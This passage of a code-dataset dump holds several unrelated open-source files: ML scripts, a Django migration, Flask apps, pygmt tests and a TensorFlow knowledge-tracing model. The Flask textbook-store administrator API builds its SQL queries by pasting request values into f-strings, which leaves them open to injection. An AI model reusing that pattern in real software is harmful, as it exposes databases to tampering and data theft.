pca.transform(x_train)\n\nplt.figure()\nplt.scatter(x_train[model.sample_label==0,0],x_train[model.sample_label==0,1],label=target_names[0])\nplt.scatter(x_train[model.sample_label==1,0],x_train[model.sample_label==1,1],label=target_names[1])\nplt.scatter(x_train[model.sample_label==2,0],x_train[model.sample_label==2,1],label=target_names[2])\nplt.legend()\nplt.show()\n","repo_name":"1837669410/ml-dl","sub_path":"ml/k-means/k-means_numpy.py","file_name":"k-means_numpy.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"29428367247","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app01', '0046_auto_20171210_1549'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='news',\n name='url',\n ),\n migrations.AddField(\n model_name='news',\n name='videourls',\n field=models.CharField(verbose_name='课程列表', max_length=5000, null=True, blank=True),\n ),\n migrations.AlterField(\n model_name='admin',\n name='userpic',\n field=models.ImageField(verbose_name='头像', default='medias/images/image30.png', upload_to='medias/images/'),\n ),\n migrations.AlterField(\n model_name='documentdata',\n name='document_data',\n field=models.FileField(verbose_name='文档资料', default='medias/document/20170209130422_Broods.txt', upload_to='medias/document/'),\n ),\n migrations.AlterField(\n model_name='documentdata',\n name='newpic',\n field=models.ImageField(verbose_name='封面图片', default='medias/upload_imgss/logo.jpg', upload_to='medias/upload_imgss/'),\n ),\n migrations.AlterField(\n model_name='news',\n name='newpic',\n field=models.ImageField(verbose_name='封面图片', default='medias/upload_imgss/logo.jpg', upload_to='medias/images/'),\n ),\n migrations.AlterField(\n model_name='news',\n name='video',\n field=models.FileField(verbose_name='教程(.mp3 .mp4)', null=True, blank=True, upload_to='medias/video/'),\n ),\n ]\n","repo_name":"wangyc666666/WoBanN","sub_path":"app01/migrations/0047_auto_20171220_1536.py","file_name":"0047_auto_20171220_1536.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7922659222","text":"import random\nfrom sqlite3 import IntegrityError\nimport string\nfrom flask import Blueprint, request, jsonify, make_response, current_app \nfrom src import db\n\n\nadministrators = Blueprint('administrators', __name__)\n\n# Listing Edit Page\n\n# /textbooks - GET\n# Get a list of textbooks and their associated listings\n@administrators.route('/textbooks', methods=['GET'])\ndef get_textbooks():\n query = '''SELECT * FROM Textbooks LEFT OUTER JOIN Listings\n ON Textbooks.ISBN = Listings.ISBN;'''\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n cursor.execute(query)\n\n row_headers = [x[0] for x in cursor.description]\n json_data = []\n rows = cursor.fetchall()\n for row in rows:\n json_data.append(dict(zip(row_headers, row)))\n\n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n\n\n# /listings/{isbn} - GET\n# Gets listing with given isbn\n@administrators.route('/listings/', methods=['GET'])\ndef get_listing(isbn):\n query = f'''SELECT * FROM Listings\n WHERE ISBN = '{isbn}'; '''\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n 
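# Editor's note (not in the original): building SQL with an f-string is\n    # injection-prone; a parameterized query, e.g.\n    # cursor.execute(\"SELECT * FROM Listings WHERE ISBN = %s\", (isbn,)), is safer.\n    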
cursor.execute(query)\n\n row_headers = [x[0] for x in cursor.description]\n json_data = []\n results = cursor.fetchall()\n\n if len(results) == 0:\n error_msg = {'error': 'No listings found for this ISBN.'}\n the_response = make_response(jsonify(error_msg))\n the_response.status_code = 400\n return the_response\n\n for row in results:\n json_data.append(dict(zip(row_headers, row)))\n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n\n\n# /listings/ - POST\n# Adds a new listing for a given textbook\n@administrators.route('/listings/', methods=['POST'])\ndef make_listing():\n data = request.json\n listing_id = \"\".join(random.choice(string.ascii_letters + string.digits) for _ in range(10))\n quantity = data['Quantity']\n price = data['Price']\n employee_id = data['EmployeeId']\n shipper_name = data['ShipperName']\n isbn = data['ISBN']\n\n # add the new listing\n query = f'''INSERT INTO Listings\n (ListingId, Quantity, Price, EmployeeId, ShipperName, ISBN)\n VALUES ('{listing_id}', '{quantity}', '{price}', '{employee_id}', '{shipper_name or 'NULL'}', '{isbn}');'''\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n try:\n cursor.execute(query)\n db.get_db().commit()\n return jsonify({\"message\": \"Listing created successfully\"}, 200)\n except KeyError as e:\n # if a required field is missing from the JSON data\n return make_response(f\"Missing field: {e}\", 400)\n except IntegrityError as e:\n # if the listing or user ids are invalid\n db.get_db().rollback()\n return make_response(str(e), 400)\n except Exception as e:\n # for any other exception\n db.get_db().rollback()\n return make_response(str(e), 500)\n \n\n# /listings/{listingId} - PUT\n# Updates attributes of listing \n@administrators.route('/listings/', methods=['PUT'])\ndef edit_listing(isbn):\n req_data = request.get_json()\n quantity = req_data.get('Quantity')\n price = req_data.get('Price')\n employee_id = req_data.get('EmployeeId')\n shipper_name = req_data.get('ShipperName')\n \n query = f'''UPDATE Listings\n SET Quantity = {quantity}, Price = {price}, EmployeeId = '{employee_id}', ShipperName = '{shipper_name}'\n WHERE ISBN = '{isbn}';'''\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n try:\n cursor.execute(query)\n db.get_db().commit()\n except IntegrityError as e:\n return jsonify({\"message\": f\"Listing {isbn} not found\"}, 400)\n\n # return success message\n return jsonify({\"message\": \"Listing updated successfully\"})\n\n\n\n# /listings/{listingId} - DELETE\n# Removes a given listing\n@administrators.route('/listings/', methods=['DELETE'])\ndef delete_listing(isbn):\n query = f\"DELETE FROM Listings WHERE ISBN = '{isbn}';\"\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n try: \n cursor.execute(query)\n db.get_db().commit()\n except IntegrityError as e:\n return make_response(str(e), 400)\n \n return \"Success\"\n\n\n\n# Reviews Edit Page\n\n# /reviews/{UserId} - GET\n# Gets all reviews associated with a given user\n\n@administrators.route('/UserReviews/', methods = ['GET'])\ndef get_user_review(UserId):\n query = f'''select UserId, ReviewId, ReviewDate, Rating, ReviewComment\n FROM UserReviews\n WHERE UserId = '{UserId}';'''\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n cursor.execute(query)\n\n row_header = [x[0] for x in cursor.description]\n json_data = []\n theData = cursor.fetchall()\n for row in theData:\n 
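# zip the column names with each row to build a JSON-serializable dict\n        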
json_data.append(dict(zip(row_header, row)))\n \n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n\n\n\n# /reviews/{UserId}/{ReviewId} - GET\n# Gets a selected review of the given user\n@administrators.route('/UserReviews//', methods = ['GET'])\ndef get_one_review(user_id, review_id):\n query = f'''select UserId, ReviewId, ReviewDate, Rating, ReviewComment\n FROM UserReviews\n WHERE UserId = '{user_id}' and ReviewId = '{review_id}';'''\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n cursor.execute(query)\n\n row_header = [x[0] for x in cursor.description]\n json_data = []\n the_data = cursor.fetchall()\n for row in the_data:\n json_data.append(dict(zip(row_header, row)))\n\n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n\n# /reviews/{userId}/{reviewID} - DELETE\n# Deletes a selected review\n@administrators.route('/UserReviews//', methods = ['DELETE'])\ndef delete_selected_review(UserId, ReviewId):\n query = f\"DELETE FROM UserReviews WHERE UserId = '{UserId}' and ReviewId = '{ReviewId}';\"\n current_app.logger.info(query)\n \n cursor = db.get_db().cursor()\n try: \n cursor.execute(query)\n db.get_db().commit()\n except IntegrityError as e:\n return make_response(str(e), 400)\n \n return \"Success\"\n\n\n# /reviews/{UserId} - POST\n# Adds a new review for a given user\n@administrators.route('/UserReviews/', methods = ['POST']) \ndef add_user_review(user_id):\n req_data = request.json\n review_id = \"\".join(random.choice(string.ascii_letters + string.digits) for _ in range(10))\n comment = req_data['Comment']\n rating = req_data['Rating']\n\n query = f'''INSERT INTO UserReviews (UserId, ReviewId, ReviewComment, Rating) \n VALUES ('{user_id}', '{review_id}', '{comment}', {rating})'''\n current_app.logger.info(query)\n \n cursor = db.get_db().cursor()\n try: \n cursor.execute(query)\n db.get_db().commit()\n except IntegrityError as e:\n return make_response(str(e), 400)\n return \"Success\"\n\n\n\n# /reviews/{userId}/{reviewID} -PUT\n# Updates a selected review\n@administrators.route('/UserReviews//', methods=['PUT'])\ndef update_review_info(user_id, review_id):\n req_data = request.json\n ReviewComment = req_data['ReviewComment']\n Rating = req_data['Rating']\n \n query = f'''UPDATE UserReviews\n SET ReviewComment = '{ReviewComment}', Rating = '{Rating}'\n WHERE UserId = '{user_id}' AND ReviewId = '{review_id}';'''\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n try: \n cursor.execute(query)\n db.get_db().commit()\n except IntegrityError as e:\n return make_response(str(e), 400)\n\n return \"Success\"\n \n\n\n# /users - GET\n# Get a list of all users in the database\n@administrators.route('/Users', methods=['GET'])\ndef get_users():\n query = f'''SELECT CONCAT(FirstName, ' ', LastName) as label, UserId as value\n FROM Users;'''\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n try: \n cursor.execute(query)\n db.get_db().commit()\n except IntegrityError as e:\n return make_response(str(e), 400)\n\n row_header = [x[0] for x in cursor.description]\n json_data = []\n theData = cursor.fetchall()\n for row in theData:\n json_data.append(dict(zip(row_header, row)))\n \n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n\n\n\n# /employees 
- GET\n# get all of the employees in the database\n@administrators.route('/employees', methods=['GET'])\ndef get_employees():\n query = f'''SELECT CONCAT(FirstName, ' ', LastName) as label, EmployeeId as value \n FROM Employees;'''\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n try: \n cursor.execute(query)\n db.get_db().commit()\n except IntegrityError as e:\n return make_response(str(e), 400)\n \n row_headers = [x[0] for x in cursor.description]\n the_data = cursor.fetchall()\n json_data = []\n for row in the_data:\n json_data.append(dict(zip(row_headers, row)))\n\n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n\n\n# /shippers - GET\n# get all of the shippers in the database\n@administrators.route('/shippers', methods=['GET'])\ndef get_shippers():\n query = f'SELECT ShipperName AS label, ShipperName AS value FROM Shippers;'\n current_app.logger.info(query)\n\n cursor = db.get_db().cursor()\n try: \n cursor.execute(query)\n db.get_db().commit()\n except IntegrityError as e:\n return make_response(str(e), 400)\n \n row_headers = [x[0] for x in cursor.description]\n the_data = cursor.fetchall()\n json_data = []\n for row in the_data:\n json_data.append(dict(zip(row_headers, row)))\n\n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n","repo_name":"pjanosky/cs3200-bibliomart-files","sub_path":"flask-app/src/administrators/administrators.py","file_name":"administrators.py","file_ext":"py","file_size_in_byte":10315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71101186409","text":"from flask import Flask, abort, request, make_response, render_template, url_for, redirect\nfrom lti_module.check_request import check_request\nfrom lti_module import utils\nfrom db import get_secret\n\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET'])\ndef index():\n return make_response(render_template('index.html', **request.args))\n\n\n@app.route('/lti', methods=['POST'])\ndef lti_route():\n params = request.form\n consumer_secret = get_secret(params.get('oauth_consumer_key', ''))\n request_info = dict( \n headers=dict(request.headers),\n data=params,\n url=request.url,\n secret=consumer_secret\n )\n \n if check_request(request_info):\n # request is ok, let's start working!\n lti_params = {\n 'username': utils.get_username(params),\n 'person_name': utils.get_person_name(params),\n 'course_title': utils.get_title(params),\n 'return_url': utils.get_return_url(params),\n 'custom_params': utils.get_custom_params(params),\n 'role': utils.get_role(params)\n }\n return redirect(url_for('index', **lti_params))\n else:\n abort(403)\n\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run()\n","repo_name":"HadronCollider/LTI_examples","sub_path":"extract_params_example/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"5162089798","text":"import random\n\nfrom data.GLC23TimeSeriesProviders import MultipleCSVTimeSeriesProvider, CSVTimeSeriesProvider\nfrom data.GLC23Datasets import TimeSeriesDataset\n\ndata_path = '/home/tlarcher/Documents/Pl@ntNet/git/GLC/data/sample_data/' # root path of the data\n# configure providers\nts_red = 
CSVTimeSeriesProvider(data_path+'SatelliteTimeSeries/time_series_red.csv')\nts_multi = MultipleCSVTimeSeriesProvider(data_path+'SatelliteTimeSeries/', select=['red', 'blue'])\nts_all = MultipleCSVTimeSeriesProvider(data_path+'SatelliteTimeSeries/')\n\n# create dataset\ndataset = TimeSeriesDataset(occurrences=data_path+'Presence_only_occurrences/Presences_only_train_sample.csv',\n providers=[ts_red, ts_multi, ts_all])\n\n# print random tensors from dataset\nids = [random.randint(0, len(dataset)-1) for i in range(5)]\nfor id in ids:\n tensor = dataset[id][0]\n label = dataset[id][1]\n print('Tensor type: {}, tensor shape: {}, label: {}'.format(type(tensor), tensor.shape, label))\n dataset.plot_ts(id)","repo_name":"plantnet/GLC","sub_path":"example_time_series_loading.py","file_name":"example_time_series_loading.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"18915180130","text":"\"\"\"\nTests for grdtrack.\n\"\"\"\nimport os\n\nimport numpy.testing as npt\nimport pandas as pd\nimport pytest\nfrom pygmt import grdtrack, which\nfrom pygmt.datasets import load_earth_relief, load_ocean_ridge_points\nfrom pygmt.exceptions import GMTInvalidInput\nfrom pygmt.helpers import data_kind\n\nTEST_DATA_DIR = os.path.join(os.path.dirname(__file__), \"data\")\nTEMP_TRACK = os.path.join(TEST_DATA_DIR, \"tmp_track.txt\")\n\n\n@pytest.fixture(scope=\"module\", name=\"dataarray\")\ndef fixture_dataarray():\n \"\"\"\n Load the grid data from the sample earth_relief file.\n \"\"\"\n return load_earth_relief(registration=\"gridline\").sel(\n lat=slice(-49, -42), lon=slice(-118, -107)\n )\n\n\n@pytest.fixture(scope=\"module\", name=\"dataframe\")\ndef fixture_dataframe():\n \"\"\"\n Load the ocean ridge file.\n \"\"\"\n return load_ocean_ridge_points()\n\n\n@pytest.fixture(scope=\"module\", name=\"csvfile\")\ndef fixture_csvfile():\n \"\"\"\n Load the csvfile.\n \"\"\"\n return which(\"@ridge.txt\", download=\"c\")\n\n\n@pytest.fixture(scope=\"module\", name=\"ncfile\")\ndef fixture_ncfile():\n \"\"\"\n Load the ncfile.\n \"\"\"\n return which(\"@earth_relief_01d\", download=\"a\")\n\n\ndef test_grdtrack_input_dataframe_and_dataarray(dataarray, dataframe):\n \"\"\"\n Run grdtrack by passing in a pandas.DataFrame and xarray.DataArray as\n inputs.\n \"\"\"\n output = grdtrack(points=dataframe, grid=dataarray, newcolname=\"bathymetry\")\n assert isinstance(output, pd.DataFrame)\n assert output.columns.to_list() == [\"longitude\", \"latitude\", \"bathymetry\"]\n npt.assert_allclose(output.iloc[0], [-110.9536, -42.2489, -2790.488422])\n\n return output\n\n\ndef test_grdtrack_input_csvfile_and_dataarray(dataarray, csvfile):\n \"\"\"\n Run grdtrack by passing in a csvfile and xarray.DataArray as inputs.\n \"\"\"\n try:\n output = grdtrack(points=csvfile, grid=dataarray, outfile=TEMP_TRACK)\n assert output is None # check that output is None since outfile is set\n assert os.path.exists(path=TEMP_TRACK) # check that outfile exists at path\n\n track = pd.read_csv(TEMP_TRACK, sep=\"\\t\", header=None, comment=\">\")\n npt.assert_allclose(track.iloc[0], [-110.9536, -42.2489, -2790.488422])\n finally:\n os.remove(path=TEMP_TRACK)\n\n return output\n\n\ndef test_grdtrack_input_dataframe_and_ncfile(dataframe, ncfile):\n \"\"\"\n Run grdtrack by passing in a pandas.DataFrame and netcdf file as inputs.\n \"\"\"\n\n output = grdtrack(points=dataframe, grid=ncfile, newcolname=\"bathymetry\")\n assert isinstance(output, 
pd.DataFrame)\n assert output.columns.to_list() == [\"longitude\", \"latitude\", \"bathymetry\"]\n npt.assert_allclose(output.iloc[0], [-32.2971, 37.4118, -1939.748245])\n\n return output\n\n\ndef test_grdtrack_input_csvfile_and_ncfile(csvfile, ncfile):\n \"\"\"\n Run grdtrack by passing in a csvfile and netcdf file as inputs.\n \"\"\"\n try:\n output = grdtrack(points=csvfile, grid=ncfile, outfile=TEMP_TRACK)\n assert output is None # check that output is None since outfile is set\n assert os.path.exists(path=TEMP_TRACK) # check that outfile exists at path\n\n track = pd.read_csv(TEMP_TRACK, sep=\"\\t\", header=None, comment=\">\")\n npt.assert_allclose(track.iloc[0], [-32.2971, 37.4118, -1939.748245])\n finally:\n os.remove(path=TEMP_TRACK)\n\n return output\n\n\ndef test_grdtrack_wrong_kind_of_points_input(dataarray, dataframe):\n \"\"\"\n Run grdtrack using points input that is not a pandas.DataFrame (matrix) or\n file.\n \"\"\"\n invalid_points = dataframe.longitude.to_xarray()\n\n assert data_kind(invalid_points) == \"grid\"\n with pytest.raises(GMTInvalidInput):\n grdtrack(points=invalid_points, grid=dataarray, newcolname=\"bathymetry\")\n\n\ndef test_grdtrack_wrong_kind_of_grid_input(dataarray, dataframe):\n \"\"\"\n Run grdtrack using grid input that is not as xarray.DataArray (grid) or\n file.\n \"\"\"\n invalid_grid = dataarray.to_dataset()\n\n assert data_kind(invalid_grid) == \"matrix\"\n with pytest.raises(GMTInvalidInput):\n grdtrack(points=dataframe, grid=invalid_grid, newcolname=\"bathymetry\")\n\n\ndef test_grdtrack_without_newcolname_setting(dataarray, dataframe):\n \"\"\"\n Run grdtrack by not passing in newcolname parameter setting.\n \"\"\"\n with pytest.raises(GMTInvalidInput):\n grdtrack(points=dataframe, grid=dataarray)\n\n\ndef test_grdtrack_without_outfile_setting(csvfile, ncfile):\n \"\"\"\n Run grdtrack by not passing in outfile parameter setting.\n \"\"\"\n output = grdtrack(points=csvfile, grid=ncfile)\n npt.assert_allclose(output.iloc[0], [-32.2971, 37.4118, -1939.748245])\n\n return output\n","repo_name":"geodeepak/Pygmt","sub_path":"pygmt/tests/test_grdtrack.py","file_name":"test_grdtrack.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4610317003","text":"import time\r\nimport math\r\n\r\nsqr = []\r\nn = int(input('Enter the number: '))\r\nstart = time.monotonic()\r\nfor i in range(2, int(math.sqrt(n * 2)) + 1):\r\n sqr.append(i ** 2)\r\n \r\nlst = list(range(2, n + 1))\r\nseq = [1]\r\nind = 0\r\nfound = False\r\nwhile len(lst) != n:\r\n for i in range(ind, len(lst)):\r\n if lst[i] + seq[-1] in sqr:\r\n if len(lst) != 1:\r\n seq.append(lst[i])\r\n del lst[i]\r\n ind = 0\r\n break\r\n elif lst[i] + 1 in sqr:\r\n found = True\r\n seq.append(lst[i])\r\n del lst[i]\r\n ind = 0\r\n print(*seq)\r\n \r\n else:\r\n lst.append(seq[-1])\r\n lst.sort()\r\n ind = lst.index(seq[-1]) + 1\r\n del seq[-1]\r\n \r\nt = time.monotonic() - start\r\nif not found:\r\n print(\"No circle exists for the number\", n)\r\nprint(\"Time taken: {}s\".format(t))\r\n","repo_name":"Swag-coder/Swag-codes","sub_path":"Circle Sequence 3.py","file_name":"Circle Sequence 3.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17063225466","text":"# This is the day 10 0f the 100days of code ........\n# We are dealing with functions and later creating a calculator\n\n\ndef 
run_am(boy,girl=\"\"):\n\tif boy ==\"\" or girl==\"\":\n\t\treturn \"Please complete the fields and try again\"\n\t\n\treturn (girl +\" \"+boy)\n\nprint(run_am(\"joshua\",\"daniella\"))\n\n\n\n\ndef is_leap(year):\n\tif year%4==0:\n\t\tif year%100==0:\n\t\t\tif year% 400==0:\n\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\telse:\n\t\treturn False\n\ndef days_in_month(year,month) :\n\n\tmonth_days=[31,28,31,30,31,30,31,31,30,31,30,31]\n\n\tif is_leap(year) and month==2:\n\n\t\treturn f\"The number of days in month {month}/{year} is {29} \"\n\n\treturn f\"The number of days in month {month}/{year} is {month_days[month-1]} \"\n\nprint(days_in_month(year=2020,month=3))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Joshua357954/100-days-of-code-challange","sub_path":"Day 10/project10.py","file_name":"project10.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"606262717","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ========================================================\n# Author: qianlinliang\n# Created date: 7/28/18\n# Description: Models definition\n# ========================================================\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport numpy as np\nimport tensorflow as tf\nimport logging\n\nfrom typing import Callable\nfrom datetime import datetime\n\ndef logit_fn(x: tf.Tensor):\n    \"\"\" Inverse of sigmoid \"\"\"\n    return np.log(x/(1-x))\n\nclass KTRNNCell(tf.nn.rnn_cell.RNNCell):\n\n    def __init__(self,\n                 skill_nb: np.int32,\n                 transit_initializer: Callable,\n                 guess_initializer: Callable,\n                 slip_initializer: Callable,\n                 guess_max: tf.Tensor,\n                 slip_max: tf.Tensor,\n                 reuse=tf.AUTO_REUSE,\n                 name=None,\n                 dtype=tf.float32):\n        \"\"\"\n        Initialization of BKTRNNCell\n        :param skill_nb: Number of skills\n        :param transit_initializer: Function use to initialize transit probability\n        :param guess_initializer: Function use to initialize guess probability\n        :param slip_initializer: Function use to initialize slip probability\n        :param corr_matrix: Correlation matrix, if None, use identical matrix\n        \"\"\"\n        super(KTRNNCell, self).__init__(_reuse=reuse, name=name, dtype=dtype)\n\n        self._skill_nb = skill_nb\n        self._transit_initializer = transit_initializer\n        self._guess_initializer = guess_initializer\n        self._slip_initializer = slip_initializer\n\n        self._guess_max = guess_max\n        self._slip_max = slip_max\n\n        self._corr_weights = tf.eye(skill_nb, dtype=tf.float32)\n\n    def build(self, _):\n        # Add transit weights\n        with tf.variable_scope(\"Standard_BKT_parameters\"):\n            self._transit_weights = self.add_weight(name=\"transit_weights\", shape=[1, self._skill_nb],\n                                                    dtype=tf.float32, initializer=self._transit_initializer)\n\n            # Add guess weights\n            self._guess_weights = self.add_weight(name=\"guess_weights\", shape=[1, self._skill_nb],\n                                                  dtype=tf.float32, initializer=self._guess_initializer)\n\n            # Add slip weights\n            self._slip_weights = self.add_weight(name=\"slip_weights\", shape=[1, self._skill_nb],\n                                                 dtype=tf.float32, initializer=self._slip_initializer)\n\n    def call(self, inputs, state):\n        skills = inputs[1]\n        observation = tf.reshape(inputs[2], [-1])\n\n        # Extract variables\n        # TODO: Try more combination functions\n        with tf.name_scope(\"Standard_BKT_logic\"):\n            p_l = tf.reduce_sum(skills*state, axis=1)/tf.reduce_sum(skills, axis=1)\n
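            # BKT quantities read off the weights below: p_l = P(skill known), p_t = P(transit), p_s = P(slip), p_g = P(guess)\n            p_t = 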
tf.sigmoid(tf.reduce_sum(skills*self._transit_weights, axis=1))\n\n p_s = tf.sigmoid(tf.reduce_sum(skills*self._slip_weights, axis=1))\n p_s = self._slip_max * p_s\n\n p_g = tf.sigmoid(tf.reduce_sum(skills*self._guess_weights, axis=1))\n p_g = self._guess_max * p_g\n\n # Main logic\n output = p_l * (1 - p_s) + (1 - p_l) * p_g\n p_l_ob = observation * (p_l * (1 - p_s)) / (p_l * (1 - p_s) + (1 - p_l) * p_g) \\\n + (1 - observation) * (p_l * p_s) / (p_l * p_s + (1 - p_l) * (1 - p_g))\n\n p_l_next = p_l_ob + (1 - p_l_ob) * p_t\n\n delta = p_l_next - p_l\n corr = tf.map_fn(lambda x: tf.reduce_max(x*self._corr_weights, axis=1), skills)\n corr = corr * tf.reshape(delta, [-1, 1])\n\n new_state = tf.clip_by_value(state + corr, clip_value_min=tf.constant(.0), clip_value_max=tf.constant(1.0))\n output = tf.reshape(output, [-1, 1]) # Keep the same shape with observation\n return output, new_state\n\n @property\n def output_size(self):\n return 1\n\n @property\n def state_size(self):\n return self._skill_nb\n\n @property\n def p_slip(self):\n return tf.sigmoid(self._slip_weights) * self._slip_max\n\n @property\n def p_guess(self):\n return tf.sigmoid(self._guess_weights) * self._guess_max\n\n @property\n def p_trasit(self):\n return tf.sigmoid(self._transit_weights)\n\n\nclass Corr_KTRNNCell(tf.nn.rnn_cell.RNNCell):\n\n def __init__(self,\n skill_nb: np.int32,\n transit_initializer: Callable,\n guess_initializer: Callable,\n slip_initializer: Callable,\n guess_max: tf.Tensor,\n slip_max: tf.Tensor,\n corr_matrix: np.ndarray = None,\n reuse=tf.AUTO_REUSE,\n name=None,\n dtype=tf.float32):\n \"\"\"\n Initialization of BKTRNNCell\n :param skill_nb: Number of skills\n :param transit_initializer: Function use to initialize transit probability\n :param guess_initializer: Function use to initialize guess probability\n :param slip_initializer: Function use to initialize slip probability\n :param corr_matrix: Correlation matrix, if None, use identical matrix\n \"\"\"\n super(Corr_KTRNNCell, self).__init__(_reuse=reuse, name=name, dtype=dtype)\n\n self._skill_nb = skill_nb\n self._transit_initializer = transit_initializer\n self._guess_initializer = guess_initializer\n self._slip_initializer = slip_initializer\n\n self._guess_max = guess_max\n self._slip_max = slip_max\n\n if corr_matrix is not None:\n self._corr_matrix = corr_matrix\n else:\n corr_matrix = np.ones(shape=(skill_nb, skill_nb)) * .1\n np.fill_diagonal(corr_matrix, .9999)\n self._corr_matrix = corr_matrix\n\n # self._corr_weights = tf.eye(skill_nb, dtype=tf.float32)\n\n def build(self, _):\n # Add transit weights\n with tf.variable_scope(\"Standard_BKT_parameters\"):\n self._transit_weights = self.add_weight(name=\"transit_weights\", shape=[1, self._skill_nb],\n dtype=tf.float32, initializer=self._transit_initializer)\n # Add guess weights\n self._guess_weights = self.add_weight(name=\"guess_weights\", shape=[1, self._skill_nb],\n dtype=tf.float32, initializer=self._guess_initializer)\n # Add slip weights\n self._slip_weights = self.add_weight(name=\"slip_weights\", shape=[1, self._skill_nb],\n dtype=tf.float32, initializer=self._slip_initializer)\n # Add corrlation matrix\n self._corr_weights = self.add_weight(name=\"corr_weights\",\n shape=[self._skill_nb, self._skill_nb],\n dtype=tf.float32,\n initializer=tf.constant_initializer(logit_fn(self._corr_matrix)))\n\n def call(self, inputs, state):\n skills = inputs[1]\n observation = tf.reshape(inputs[2], [-1])\n\n # Extract variables\n # TODO: Try more combination functions\n with 
tf.name_scope(\"Standard_BKT_logic\"):\n p_l = tf.reduce_sum(skills*state, axis=1)/tf.reduce_sum(skills, axis=1)\n p_t = tf.sigmoid(tf.reduce_sum(skills*self._transit_weights, axis=1))\n\n p_s = tf.sigmoid(tf.reduce_sum(skills*self._slip_weights, axis=1))\n p_s = self._slip_max * p_s\n\n p_g = tf.sigmoid(tf.reduce_sum(skills*self._guess_weights, axis=1))\n p_g = self._guess_max * p_g\n\n # Main logic\n output = p_l * (1 - p_s) + (1 - p_l) * p_g\n p_l_ob = observation * (p_l * (1 - p_s)) / (p_l * (1 - p_s) + (1 - p_l) * p_g) \\\n + (1 - observation) * (p_l * p_s) / (p_l * p_s + (1 - p_l) * (1 - p_g))\n\n p_l_next = p_l_ob + (1 - p_l_ob) * p_t\n\n delta = p_l_next - p_l\n corr = tf.map_fn(lambda x: tf.reduce_max(x*tf.sigmoid(self._corr_weights), axis=1), skills)\n corr = corr * tf.reshape(delta, [-1, 1])\n\n new_state = tf.clip_by_value(state + corr, clip_value_min=tf.constant(.0), clip_value_max=tf.constant(1.0))\n output = tf.reshape(output, [-1, 1]) # Keep the same shape with observation\n return output, new_state\n\n @property\n def output_size(self):\n return 1\n\n @property\n def state_size(self):\n return self._skill_nb\n\n @property\n def corr_matrix(self):\n return tf.sigmoid(self._corr_weights)\n\n @property\n def p_slip(self):\n return tf.sigmoid(self._slip_weights) * self._slip_max\n\n @property\n def p_guess(self):\n return tf.sigmoid(self._guess_weights) * self._guess_max\n\n @property\n def p_trasit(self):\n return tf.sigmoid(self._transit_weights)\n\n# Standard bayesian knowledge tracing model\nclass StandardBKTModel:\n def __init__(self, skill_nb: np.int, max_guess: np.float, max_slip: np.float,\n learned_init: np.float = None, transit_init: np.float = None,\n guess_init: np.float = None, slip_init: np.float = None,\n train_corr_matrix=True, corr_matrix=None, log_dir=None):\n \"\"\"\n Initialize BKT model\n :param skill_nb: The number of skills\n :param max_guess: Max guess probability\n :param max_slip: Max slip probability\n :param leanred_init: Initial value of learned parameters\n :param transit_init: Initial value of transit probability\n :param guess_init: Initial value of guess probability\n :param slip_init: Initial value of slip probability\n \"\"\"\n # TODO: Add value checker for parameters\n\n self._skill_nb = skill_nb\n self._max_guess = max_guess\n self._max_slip = max_slip\n self._learned_init = learned_init\n self._transit_init = transit_init\n self._guess_init = guess_init\n self._slip_init = slip_init\n self._train_corr = train_corr_matrix\n self._corr_matrix = corr_matrix\n\n # Create graph and session for this model\n self._sess = tf.Session()\n\n self._built = False\n\n # Configure logger\n self._logger = logging.getLogger(\"Standard_BKT_Model\")\n self._logger.setLevel(logging.INFO)\n\n stream_handler = logging.StreamHandler()\n 